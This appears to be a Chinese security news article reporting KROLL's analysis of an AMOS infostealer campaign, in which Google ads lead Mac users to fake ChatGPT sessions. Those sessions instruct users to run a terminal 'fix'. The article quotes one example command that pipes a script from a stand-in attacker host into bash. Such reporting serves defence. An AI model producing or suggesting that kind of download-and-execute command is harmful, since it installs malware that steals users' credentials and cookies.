攻击者利用ChatGPT传播AMOS信息窃取程序攻击Mac设备
AMOS信息窃取程序通过伪装成ChatGPT故障排除工具感染Mac设备。攻击者利用Google广告将恶意链接置于搜索结果首位。受害者在看似正常的聊天界面中执行终端命令后,恶意脚本下载并运行AMOS程序。该程序窃取浏览器数据、凭证及会话cookie等敏感信息。 2025-12-11 00:14:56 Author: www.freebuf.com(查看原文) 阅读量:3 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

image

最新发现的 AMOS 信息窃取程序攻击活动正利用用户对 ChatGPT 的信任,以提供简单故障排除帮助为幌子感染 Mac 设备。受害者搜索声音问题解决方案时,会点击赞助的 ChatGPT 结果,随后看到看似正常的聊天会话界面。

该聊天会话会返回一条"修复"命令,并指示用户在 macOS 终端中运行该命令。

受感染 Mac 设备的 Google Chrome 浏览历史记录(来源:KROLL)

这种攻击将社会工程学手段与技术滥用相结合,让用户感觉操作流程十分常规。攻击过程中既没有伪造的安装程序窗口,也没有明显的钓鱼页面。受害者只是在一个知名 AI 聊天界面中,遵循看似正常的支持流程。KROLL 安全研究人员确认,该流程被用于在目标 Mac 终端上部署 AMOS 信息窃取程序。

KROLL 团队发现,攻击者通过 Google 广告推送诱饵,将恶意 ChatGPT 会话置于搜索结果首位。显示的域名真实有效,这使得普通用户更难察觉风险。一旦用户信任该聊天会话,仅需在终端执行一次复制粘贴操作就足以入侵系统。

向用户展示的 ChatGPT 指令(来源:KROLL)

感染机制与恶意命令执行

KROLL 分析师追踪发现,初始感染源自伪造 ChatGPT 聊天提供的终端命令,该命令可作为入侵指标。该命令指示 macOS 下载并运行远程脚本,这种模式与 MITRE ATT&CK 技术中的用户执行和入口工具转移技术相符。

典型恶意模式如下:

curl -s https://attacker-example[.]com/installer.sh | bash

执行后,这条单行命令通过 HTTPS 拉取 shell 脚本,不会在用户可见位置保存任何内容,并在同一终端会话中运行脚本。该脚本随后可安装 AMOS 程序、建立持久化机制并开始窃取数据。

无论对家庭用户还是企业,此次攻击的影响都极为严重。AMOS 信息窃取程序专门用于从受感染的 Mac 设备中窃取浏览器数据、凭证、会话 cookie 及其他存储的敏感信息。失窃数据可被用于账户接管、横向移动或在地下市场出售。

参考来源:

Threat Actors Leverage ChatGPT to Attack Mac Devices With AMOS InfoStealer

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/endpoint/461618.html
如有侵权请联系:admin#unsafe.sh